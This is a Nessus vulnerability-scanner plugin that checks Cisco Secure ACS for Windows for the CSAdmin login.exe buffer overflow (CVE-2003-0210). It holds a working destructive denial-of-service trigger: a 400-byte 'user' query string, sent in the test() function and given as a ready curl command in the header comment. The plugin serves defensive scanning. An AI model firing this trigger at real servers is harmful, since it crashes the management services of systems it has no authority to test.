CiscoSecure ACS for Windows CSAdmin Login Overflow DoS

The remote web server crashed when the ‘login.exe’ CGI received an overly long query string (this check sends a 400-byte ‘user’ value). This results in a denial of service and may allow execution of arbitrary code. Some versions of the Cisco Secure ACS web server are known to be vulnerable to this flaw. Note that the check itself is destructive: it takes a vulnerable CSAdmin web service down.

#
# This script was written by Xue Yong Zhi <[email protected]>
# Rewritten by Tenable Network Security, Inc.
#
# See the Nessus Scripts License for details
#
# References:
# NSFOCUS SA2003-04
# Manual trigger (destructive -- it takes a vulnerable CSAdmin service down):
# curl -i "http://host:2002/login.exe?user=`perl -e "print ('a'x400)"`&reply=any&id=1"
########################

include("compat.inc");

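if (description)
{
 script_id(11556);
 script_version("1.25");
 script_cvs_date("Date: 2018/07/06 11:26:08");

 script_cve_id("CVE-2003-0210");
 script_bugtraq_id(7413);
 script_xref(name:"CERT", value:"697049");
 script_xref(name:"NSFOCUS", value:"SA2003-04");

 script_name(english:"CiscoSecure ACS for Windows CSAdmin Login Overflow DoS");
 script_summary(english:"CISCO Secure ACS Management Interface Login Overflow");

 script_set_attribute(attribute:"synopsis", value:"Arbitrary code may be executed on the remote host.");
 # Report text: the check sends a 400-byte 'user' value to login.exe
 # (see test() below) and only observes whether the server stays up.
 script_set_attribute(attribute:"description", value:
"The remote web server crashed when the 'login.exe' CGI received an
overly long 'user' value in the login query string. This results in a
denial of service and may allow execution of arbitrary code. Some
versions of the Cisco Secure ACS web server are known to be vulnerable
to this flaw.");
 # https://web.archive.org/web/20030425095257/http://www.cisco.com/warp/public/707/cisco-sa-20030423-ACS.shtml
 script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?9a387006");
 script_set_attribute(attribute:"solution", value:"Install ACS for Windows versions 3.0.4, 3.1.2, or later");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");

 script_set_attribute(attribute:"vuln_publication_date", value:"2003/04/23");
 script_set_attribute(attribute:"patch_publication_date", value:"2003/04/23");
 script_set_attribute(attribute:"plugin_publication_date", value:"2003/04/30");

 # Detection is heuristic (liveness before/after the request), so the
 # finding is flagged as potential and the plugin is paranoid-gated.
 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_set_attribute(attribute:"cpe", value:"cpe:/a:cisco:secure_access_control_server");
 script_end_attributes();

 # DESTRUCTIVE: a vulnerable target loses its CSAdmin web service.
 script_category(ACT_DESTRUCTIVE_ATTACK);

 script_copyright(english:"This script is Copyright (C) 2003-2018 Xue Yong Zhi & Tenable Network Security, Inc.");
 script_family(english:"Web Servers");

 script_dependencie("http_version.nasl");
 script_require_keys("Settings/ParanoidReport");
 # CSAdmin's default management port.
 script_require_ports("Services/www", 2002);

 exit(0);
}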

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

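# Sends the overflow trigger to /login.exe and reports a hole if the web
# server stops answering afterwards.
#
# port : HTTP port of the ACS management interface.
#
# Returns 1 when the server went down after the request (a hole is
# reported), 0 when the check was skipped or the server survived, and
# NULL when the request itself could not be sent.
#
# NOTE: this is a DESTRUCTIVE check (ACT_DESTRUCTIVE_ATTACK): a
# vulnerable target loses its CSAdmin web service until it is restarted.
function test(port)
{
  local_var r;

  # Do not fire the payload at a server that is already down or that
  # does not expose login.exe at all.
  if (http_is_dead(port:port) ||
      ! is_cgi_installed3(item: "/login.exe", port: port))
    return 0;

  # Same trigger as the NSFOCUS reference: 400 filler bytes in 'user'.
  r = http_send_recv3(port: port, method: "GET", item: strcat("/login.exe?user=", crap(400), "&reply=any&id=1"));
  if (isnull(r)) return NULL;

  # The only evidence available is liveness: a server that no longer
  # answers after the request is treated as crashed. Network trouble
  # between the two probes would look the same, which is presumably why
  # the plugin is gated behind paranoid reporting.
  if (http_is_dead(port: port, retry:3))
  {
    security_hole(port);
    return 1;
  }

  # Server survived the request: nothing to report.
  return 0;
}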

# Crash detection is a liveness heuristic, so only run when the scan
# policy asks for paranoid reporting.
if (report_paranoia < 2) audit(AUDIT_PARANOID);

# CSAdmin's default port is 2002 (see script_require_ports above).
http_port = get_http_port(default: 2002, embedded: 1);
test(port: http_port);